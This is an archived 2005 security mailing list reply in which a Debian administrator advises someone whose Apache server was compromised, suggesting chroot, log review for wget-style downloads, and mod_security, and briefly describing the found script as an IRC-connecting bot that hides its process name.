lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri, 29 Apr 2005 22:36:53 +0100
From: Steve Kemp <>
To: Andrew Y Ng <>
Subject: Re: Apache hacks (./atac, d0s.txt)

On Fri, Apr 29, 2005 at 02:03:58PM -0500, Andrew Y Ng wrote:

> My server has been seeing some usual activities today, I don't have much time
> to get down to the bottom of things, but after I investigated briefly I have
> decided to disable PERL executable permission for www-data (Apache process's
> user), also locked /var/tmp so www-data cannot write to it. 

  Use chrot to protect your server slightly more against problems
 with any buggy scripts.

  This is almost certainly the result of an insecue PHP, Perl, or
 other CGI script - rather than an Apache hack.

  If you examine your webservers logs you might see where the 
 attack happened, perhaps you'll have entries invoking the
 'wget' command to download the script you found from a remote
 server - that's often a common attack.

  If you're interested in protecting your server against input
 designed to attack insecure applications you might wish to
 investigate 'mod_security'.

  mod-security homepage:

  mod-security under Debian example:

> Looks like it ignores all the `kill` signals, not sure how I can actually
> kill it...

  As root.

> here's d0s.txt:

  Connects to an irc server, forking to make its name less obvious
 on the process list.

# Debian System Administration

Powered by blists - more mailing lists